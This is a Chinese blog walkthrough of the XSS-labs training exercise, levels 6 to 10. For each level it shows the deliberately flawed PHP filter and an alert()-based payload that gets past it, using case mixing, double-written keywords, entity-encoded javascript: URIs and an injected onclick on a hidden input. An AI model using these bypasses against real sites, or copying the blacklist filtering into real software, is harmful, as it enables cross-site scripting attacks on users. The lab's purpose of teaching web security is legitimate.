XSS-lab靶场(6~10)

最新推荐文章于 2022-10-27 12:15:39 发布
最新推荐文章于 2022-10-27 12:15:39 发布
阅读量420 收藏 1
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/120909711
版权

xss php web安全 网络安全 前端

Level 6

这里我们就省去黑盒测试的步骤了,直接来看看源码吧:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

虽然看起来过滤的还不错,但是相较于前一题,这里并没有strtolower(),所以使用大小写混写就可以了。
payload:

"><SCRIPT>alert('xss')</SCRIPT>

在这里插入图片描述

Level 7

后面我们都会截取关键源码,不会再全部截取了。

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

这里有了转小写,但是这里的替换函数是将目标替换为了空,那么显然我们可以使用双写的方法绕过。
所以这里的payload都是可用的,看你,只是需要双写。

"><scrscriptipt>alert('xss')</scrscriptipt>

在这里插入图片描述

Level 8

这里,已经转变为添加超链接了。
看一下它是如何工作的:
在这里插入图片描述
就是将我们input当中的内容添加到下面ahref属性当中去。
关键源码:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

这里已经是相当好的屏蔽了,但是是由于可以让所写内容写在外部,我们可以使用html实体编码

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)

给出一个实体编码的网址:
https://www.qqxiuzi.cn/bianma/zifushiti.php

但是实体编码是无法对标签使用的。
在这里插入图片描述

Level 9

相对于上一关,这里多出了一段脚本如下:

if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}

这里还会对内容进行检查,更加严格些了
但是又因为仅仅是检查是否含有,我们可以将这个关键的字符串放在对于我们无关紧要的地方,如提示话语包含这个就行了
payload:

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://i am hack!');

在这里插入图片描述

Level 10

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里是表单隐藏,对于keyword参数,是非常难进行攻击的,因为这里转实体化且双引号闭合。这里攻击的关键就是利用这个隐藏的input标签,较为进阶的input标签利用,对于t_sort,做了两次过滤

这里给出引用 accesskey属性,

accesskey 属性规定激活(使元素获得焦点)元素的快捷键。

也就是说,加上这个属性,我们就可以使用快捷键来定位出该元素,更加准确(如果直接看不出来元素的话)

在这里,其实就是要去掉隐藏属性,当input标签同时拥有两个属性,可见和不可见时,会处理为可见,所以只需要再次调一下这个标签的type属性即可

" οnclick="alert(123)" type="text

在这里插入图片描述

sayo.
关注
专栏目录
xss-lab靶场资源包
07-27
通过使用XSS-Lab靶场资源包,安全从业者和爱好者可以模拟真实环境下的攻击场景,提高对XSS漏洞的识别能力和防御能力,这对于保障网络应用的安全至关重要。在实践中学习和理解这些知识,有助于提升网络安全专业素养,...
xss绕过尖括号和双括号_XSS过关wp(未完待续,目前13)
weixin_42309456的博客
12-16 698
1.LEVEL 1审计源码:注意这几行:<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> GET方式传送一个参数name ,然后直接拼接echo所以给name直接传个最简单的xss弹窗即可:2.LEVEL...
[靶场] XSS-Labs 06-10
3hex的博客
09-19 906
6. Level6-大小写绕过 GET请求方式,数据回显在input标签的value中。 我们尝试注入事件。 on被过滤为o_n。我们尝试大小写绕过。 http://127.0.0.1:8005/level6.php?keyword="+oNclick="alert(1) 点击成功触发XSS。 代码: 只过滤<script、on、src、data、href,没有过滤大小写,例如:<ScRipT、oN。 同理使用注入脚本(script改为sCript)也可也.
XSS攻击
球球的博客
03-04 2915
xss原理,绕过方式
(新手)xss-labs靶场6-10关通过方式
A_luncher的博客
10-27 281
xss-labs6-10关新手教程
xss-labs靶场全通关
m0_52051132的博客
10-15 1672
在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
xss-lab全通关教程
05-07
XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-labs靶场通关
最新发布
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 1028
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
xss-labs靶场通关payload
weixin_51339377的博客
04-18 704
地址: 欢迎来到XSS挑战 流程: 1.正常人 正常去输入即可 2.标准测试代码输入 找相应的互动点有哪些 查看网页源代码 3.寻找注入点 构造payload提交即可 ssaq.com dsds' value=javascript:alert(1) Level1 url:https://xssaq.com/yx/level1.php?name=test <h2 align=center>欢迎用户test</h2><center><..
XSSxss-labs-level6
Hugu
02-23 389
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该网页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS
XSSLab学习笔记-第6到10
Mr___Blue的博客
05-02 459
写在前面: 仅供学习使用 第六关 照例测试看看有无过滤,可以看出标签没被过滤,只是关键字重组了。 最重要的是发现大小写没被过滤,那么闭合input完事。 第七关 照例弹窗测试,发现关键字被过滤了,大小写也被过滤了,但是标签可以用。看到过滤想到嵌套,试试嵌套。 嵌套发现没问题,那么闭合input完事。 从<script>alert(1)</script>变成<>alert(1)</>,可以看出过滤且清除了script、
渗透学习-靶场篇-XSS-labs(持续更新中)
qq_43696276的博客
09-24 2075
在进行学习玩XSS的大部分基础知识后,以及初步完成一些简单的XSS测试后。接下里让我们开始对xss-labs进行攻略吧!!不过需要注意的是,对于xss-labs我们只需大致了解一些思路即可,因为实战中,一般很少有这种弯弯绕绕的地方,不过可能在CTF中倒是会比较常见。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
XSS学习 xss-Lab题解
qq_61768489的博客
02-12 2473
level 1 没有任何防护,直接url传xss name=<script>alert(1)</script> level2 有个input标签,尝试用"> 闭合标签 (在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签) "><script>alert(1)</script> level 3 测试发现尖括号被转换字...
XSS-LABS 1-19
XINO
11-20 1881
之前学习xss时用过,发出来与大家交流 介绍 XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS 首先介绍一下xss-labxss-lab是一个用于
当黑客就入门 XSS-Lab第六关
Tuye的博客
07-20 294
第一步:判断是否存在XSS注入漏洞 输入的关键词有进行回显,故存在XSS漏洞 ** 第二步:尝试利用该漏洞 ** 尝试对输入的关键词进行大小写 1987" ONinput="alert(1987) "> <a Href="javascript:alert('test')">link</a> 总结:此题为对关键词和符号的黑名单形式,可以通过对部分字符进行大小...
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值